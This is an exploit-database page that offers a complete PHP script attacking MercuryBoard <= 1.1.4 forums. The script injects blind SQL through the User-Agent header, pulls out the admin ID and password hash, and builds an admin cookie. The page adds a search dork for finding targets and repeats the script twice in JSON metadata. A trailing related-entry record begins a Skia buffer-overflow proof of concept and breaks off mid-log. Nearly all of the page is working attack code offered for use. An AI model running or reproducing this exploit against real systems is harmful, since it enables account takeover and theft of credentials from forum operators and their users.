Search...

MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit

2006-08-23T00:00:00

ID 1337DAY-ID-736
Type zdt
Reporter rgod
Modified 2006-08-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
MercuryBoard &lt;= 1.1.4 (User-Agent) Remote SQL Injection Exploit
===============================================================




#!/usr/bin/php -q -d short_open_tag=on
&lt;?
print_r('
--------------------------------------------------------------------------------
MercuryBoard &lt;= 1.1.4 "User-Agent" SQL injection / privilege escalation exploit
(php version)
by rgod [email protected]
site: http://retrogod.altervista.org
dork: "Powered by MercuryBoard"
--------------------------------------------------------------------------------
');
/*
works regardless of php.ini settings
against MySQL &gt; 4.1 (allowing subs)
not working for me, so I wrote my version
vulnerability is actually unpatched...
*/

if ($argc&lt;3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to MercuryBoard
Options:
   -p[port]:    specify a port other than 80
   -P[ip:port]: specify a proxy
Examples:
php '.$argv[0].' localhost /mercury/
php '.$argv[0].' localhost /mercury/ -p81
php '.$argv[0].' localhost / -P1.1.1.1:80
--------------------------------------------------------------------------------
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i&lt;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i&lt;$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]&lt;&gt;'/') or ($path[strlen($path)-1]&lt;&gt;'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$packet="GET ".$p."index.php?a=active HTTP/1.0\r\n";
$packet.="User-Agent: '\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("REPLACE INTO",$html))
{
echo "vulnerable...\n";
$temp=explode("REPLACE INTO ",$html);
$temp2=explode("active",$temp[1]);
$prefix=$temp2[0];
echo "prefix -&gt; ".$prefix."\n";sleep(1);
}
else
{
die("not vulnerable...\n");
}

$ch[0]=0;//null
$ch=array_merge($ch,range(48,57)); //numbers
$j=1;
$id="";
echo "building the admin cookie...\nid: ";
while (!strstr($id,chr(0)))
{
for ($i=0; $i&lt;=255; $i++)
{
if (in_array($i,$ch))
{
$packet="GET ".$p."index.php?a=active HTTP/1.0\r\n";
$packet.="User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_id,".$j.",1))=".$i."),'suntzu','suntzoi'))/**/FROM/**/".$prefix."users/**/WHERE/**/user_group=1))/*\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax near 'SELECT",$html))
{die("\nWrong MySql version, sorry...");}
if (!eregi("Viewing the active users",$html)) {$id.=chr($i);echo chr($i);sleep(1);break;}
}
if ($i==255) {die("\nExploit failed...");}
}
$j++;
}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
echo "\npassword (md5): ";
while (!strstr($password,chr(0)))
{
for ($i=0; $i&lt;=255; $i++)
{
if (in_array($i,$chars))
{
$packet="GET ".$p."index.php?a=active HTTP/1.0\r\n";
$packet.="User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_password,".$j.",1))=".$i."),'suntzu','suntzoi'))/**/FROM/**/".$prefix."users/**/WHERE/**/user_group=1))/*\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi("Viewing the active users",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}
}
if ($i==255) {die("\nExploit failed...");}
}
$j++;
}
echo "\nyour admin cookie:\n mercury_user=$id; mercury_pass=$password;\n";
?&gt;



#  0day.today [2018-04-10]  #

JSON Vulners Source

Initial Source

{"published": "2006-08-23T00:00:00", "id": "1337DAY-ID-736", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T02:31:14", "bulletin": {"published": "2006-08-23T00:00:00", "id": "1337DAY-ID-736", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-19T02:31:14", "vector": "AV:L/AC:L/Au:M/C:C/I:C/A:C/"}}, "hash": "995730d39f32837b50a6814285ba47fff9c1c22c3b2fcc2259f479fcd5a8fca5", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T02:31:14", "edition": 1, "title": "MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit", "href": "http://0day.today/exploit/description/736", "modified": "2006-08-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "http://0day.today/exploit/736", "references": [], "reporter": "rgod", "sourceData": "===============================================================\r\nMercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit\r\n===============================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nMercuryBoard <= 1.1.4 \"User-Agent\" SQL injection / privilege escalation exploit\r\n(php version)\r\nby rgod rgod@autistici.org\r\nsite: http://retrogod.altervista.org\r\ndork: \"Powered by MercuryBoard\"\r\n--------------------------------------------------------------------------------\r\n');\r\n/*\r\nworks regardless of php.ini settings\r\nagainst MySQL > 4.1 (allowing subs)\r\nnot working for me, so I wrote my version\r\nvulnerability is actually unpatched...\r\n*/\r\n\r\nif ($argc<3) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to MercuryBoard\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExamples:\r\nphp '.$argv[0].' localhost /mercury/\r\nphp '.$argv[0].' localhost /mercury/ -p81\r\nphp '.$argv[0].' localhost / -P1.1.1.1:80\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n }\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: '\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"REPLACE INTO\",$html))\r\n{\r\necho \"vulnerable...\\n\";\r\n$temp=explode(\"REPLACE INTO \",$html);\r\n$temp2=explode(\"active\",$temp[1]);\r\n$prefix=$temp2[0];\r\necho \"prefix -> \".$prefix.\"\\n\";sleep(1);\r\n}\r\nelse\r\n{\r\ndie(\"not vulnerable...\\n\");\r\n}\r\n\r\n$ch[0]=0;//null\r\n$ch=array_merge($ch,range(48,57)); //numbers\r\n$j=1;\r\n$id=\"\";\r\necho \"building the admin cookie...\\nid: \";\r\nwhile (!strstr($id,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$ch))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_id,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"You have an error in your SQL syntax near 'SELECT\",$html))\r\n{die(\"\\nWrong MySql version, sorry...\");}\r\nif (!eregi(\"Viewing the active users\",$html)) {$id.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\necho \"\\npassword (md5): \";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$chars))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_password,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (!eregi(\"Viewing the active users\",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\necho \"\\nyour admin cookie:\\n mercury_user=$id; mercury_pass=$password;\\n\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f56987f4986db4e8c8c139b95e0228f9", "key": "sourceData"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "0280c4d4eb9bba482901450f73ca1922", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "modified"}, {"hash": "7e20f5817bb52696c74ad6a3f7977197", "key": "title"}, {"hash": "db922059e8fc0bd66cac9e3660863428", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "ebc234b82f4e6ff74433f20e87530143043a81cb5c0717a941216babb12fbeff", "enchantments": {"score": {"value": -0.6, "vector": "NONE", "modified": "2018-04-10T09:50:42"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32141", "1337DAY-ID-30541", "1337DAY-ID-28948", "1337DAY-ID-27797", "1337DAY-ID-27576"]}, {"type": "nessus", "idList": ["ACTIVEMQ_5_15_5.NASL", "ORACLE_WEBCENTER_SITES_APR_2018_CPU.NASL", "VIRTUOZZO_VZLSA-2017-0021.NASL", "EULEROS_SA-2017-1007.NASL", "EULEROS_SA-2017-1008.NASL", "DEBIAN_DSA-3818.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:44846", "EDB-ID:43111", "EDB-ID:42021"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148068", "PACKETSTORM:144878"]}, {"type": "seebug", "idList": ["SSV:97208"]}, {"type": "kaspersky", "idList": ["KLA11098"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}], "modified": "2018-04-10T09:50:42"}, "vulnersScore": -0.6}, "type": "zdt", "lastseen": "2018-04-10T09:50:42", "edition": 2, "title": "MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit", "href": "https://0day.today/exploit/description/736", "modified": "2006-08-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 17, "cvelist": [], "sourceHref": "https://0day.today/exploit/736", "references": [], "reporter": "rgod", "sourceData": "===============================================================\r\nMercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit\r\n===============================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nMercuryBoard <= 1.1.4 \"User-Agent\" SQL injection / privilege escalation exploit\r\n(php version)\r\nby rgod [email\u00a0protected]\r\nsite: http://retrogod.altervista.org\r\ndork: \"Powered by MercuryBoard\"\r\n--------------------------------------------------------------------------------\r\n');\r\n/*\r\nworks regardless of php.ini settings\r\nagainst MySQL > 4.1 (allowing subs)\r\nnot working for me, so I wrote my version\r\nvulnerability is actually unpatched...\r\n*/\r\n\r\nif ($argc<3) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to MercuryBoard\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExamples:\r\nphp '.$argv[0].' localhost /mercury/\r\nphp '.$argv[0].' localhost /mercury/ -p81\r\nphp '.$argv[0].' localhost / -P1.1.1.1:80\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n }\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: '\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"REPLACE INTO\",$html))\r\n{\r\necho \"vulnerable...\\n\";\r\n$temp=explode(\"REPLACE INTO \",$html);\r\n$temp2=explode(\"active\",$temp[1]);\r\n$prefix=$temp2[0];\r\necho \"prefix -> \".$prefix.\"\\n\";sleep(1);\r\n}\r\nelse\r\n{\r\ndie(\"not vulnerable...\\n\");\r\n}\r\n\r\n$ch[0]=0;//null\r\n$ch=array_merge($ch,range(48,57)); //numbers\r\n$j=1;\r\n$id=\"\";\r\necho \"building the admin cookie...\\nid: \";\r\nwhile (!strstr($id,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$ch))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_id,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"You have an error in your SQL syntax near 'SELECT\",$html))\r\n{die(\"\\nWrong MySql version, sorry...\");}\r\nif (!eregi(\"Viewing the active users\",$html)) {$id.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\necho \"\\npassword (md5): \";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$chars))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_password,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (!eregi(\"Viewing the active users\",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\necho \"\\nyour admin cookie:\\n mercury_user=$id; mercury_pass=$password;\\n\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "4544196b6d2b7e187f4b98f0616b2219", "key": "href"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "modified"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "ec5e6c04c1e89705cb44984dede7b27e", "key": "sourceData"}, {"hash": "38262308515fb51c8c218547cf9f9057", "key": "sourceHref"}, {"hash": "7e20f5817bb52696c74ad6a3f7977197", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"zdt": [{"lastseen": "2019-02-25T06:30:28", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "1337DAY-ID-32141", "href": "https://0day.today/exploit/description/32141", "title": "Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows Exploit", "type": "zdt", "sourceData": "I was looking into the root cause of https://bugs.chromium.org/p/chromium/issues/detail?id=850350. In that bug, due to precision errors, Skia generated a concave RRect, but declared it convex. Later, the RRect was transformed with an affine transform and used as a clipping region for drawing. Because the convex path filling algorithm was used while the path was actually concave, this broke some assumptions and led to a stack out-of-bounds write.\r\n\r\nThe bug was fixed by addressing the precision errors in RRect generation. However, there is another subtle issue:\r\n\r\nIf Skia ever declares a path convex, the convexity attribute is going to survive affine transforms. Normally, in geometry, transforming a convex path with an affine transform is always going to result in a convex path. However, in Skia, due to precision limitations, that assumption might be incorrect because:\r\n\r\n a) Due to precision errors, Skia may declare a polygon with tiny concavities to be convex. Using an affine transform, the concavities can then be rotated and enlarged.\r\n b) It might be possible, that due to precision errors, applying an affine transform on a convex path might result in tiny concavities that can be blown up by subsequent transformations.\r\n\r\nThere are possible multiple places where using a concave polygon with incorrect convexity attribute might lead to problems. The one I used in the PoC is the same as in https://bugs.chromium.org/p/chromium/issues/detail?id=850350. What happens there is walk_convex_edges() being used on a concave path:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?l=213&rcl=61c5108108acaeb4ee7fc8cb97c41f4f97d99040\r\nThis leads to breaking another Skia assumption - that the image is always going to be rendered in the top-to-bottom, left-to-right order.\r\nIf the path is used as a clipping region, this leads to incorrect ordering of runs in SkRgnBuilder. When the correspoding SkRgnClipBlitter is used, the \"left < right\" assumption gets broken here\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkBlitter.cpp?l=612&rcl=b2a232fb20358ccd6c7c2fafb7e83e444e4e2458\r\nwhich results in calling SkAlphaRuns::Break with the negative \"count\" argument, which leads to out-of-bounds write here:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154\r\n\r\nThe following Skia program demonstrates the issue:\r\n\r\n=================================================================\r\n\r\n#include <stdio.h>\r\n\r\n#include \"SkCanvas.h\"\r\n#include \"SkPath.h\"\r\n#include \"SkBitmap.h\"\r\n#include \"SkRegion.h\"\r\n\r\nint main(int argc, char * const argv[]) {\r\n\r\n SkBitmap bitmap;\r\n bitmap.allocN32Pixels(24, 24);\r\n SkCanvas canvas(bitmap);\r\n\r\n SkPaint paint;\r\n paint.setAntiAlias(true);\r\n paint.setStyle(SkPaint::kFill_Style);\r\n\r\n // This is monotone in both x and y, but has a tiny concavity\r\n SkPath path;\r\n path.moveTo(-1,-1);\r\n path.lineTo(0, 0);\r\n path.lineTo(0, 0.5e-10);\r\n path.lineTo(0.1e-10, 1.1e-10);\r\n path.lineTo(1.5e-10, 1.1e-10);\r\n path.lineTo(1.5e-10, 2.5e-10);\r\n path.lineTo(0.9, 1);\r\n path.lineTo(-1, 1);\r\n path.close();\r\n\r\n // If asked, Skia is going to declare it convex\r\n if(path.isConvex()) {\r\n printf(\"convex\\n\");\r\n } else {\r\n printf(\"not convex\\n\");\r\n }\r\n\r\n // The convexity flag is going to survive all affine transforms\r\n // Even those that will enlarge the concavity and make the path\r\n // non-monotone.\r\n SkMatrix m;\r\n m.setRotate(-45);\r\n m.postScale(10e10, 10e10);\r\n m.postSkew(-1, 0);\r\n m.postTranslate(1, 10);\r\n path.transform(m);\r\n\r\n // As demonstrated here\r\n if(path.isConvex()) {\r\n printf(\"convex\\n\");\r\n } else {\r\n printf(\"not convex\\n\");\r\n }\r\n\r\n // We'll use the path as a clip region\r\n canvas.clipPath(path);\r\n\r\n // And now we'll just draw a simple triangle.\r\n SkPath path2;\r\n path2.moveTo(15.5, 15);\r\n path2.lineTo(50.5, 50);\r\n path2.lineTo(-19.5, 50);\r\n path2.close();\r\n canvas.drawPath(path2, paint);\r\n\r\n printf(\"done\\n\");\r\n\r\n return 0;\r\n}\r\n\r\n=================================================================\r\n\r\nASan log:\r\n\r\n=================================================================\r\n==139872==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc5c8950d4 at pc 0x00000135512e bp 0x7ffc5c894f30 sp 0x7ffc5c894f28\r\nWRITE of size 1 at 0x7ffc5c8950d4 thread T0\r\n #0 0x135512d in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26\r\n #1 0x135512d in SkRgnClipBlitter::blitAntiH(int, int, unsigned char const*, short const*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.cpp:615\r\n #2 0xac437f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:96:15\r\n #3 0x1465fa4 in blit_trapezoid_row(AdditiveBlitter*, int, int, int, int, int, int, int, unsigned char, unsigned char*, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp\r\n #4 0x1465fa4 in aaa_walk_convex_edges(SkAnalyticEdge*, AdditiveBlitter*, int, int, int, int, bool) 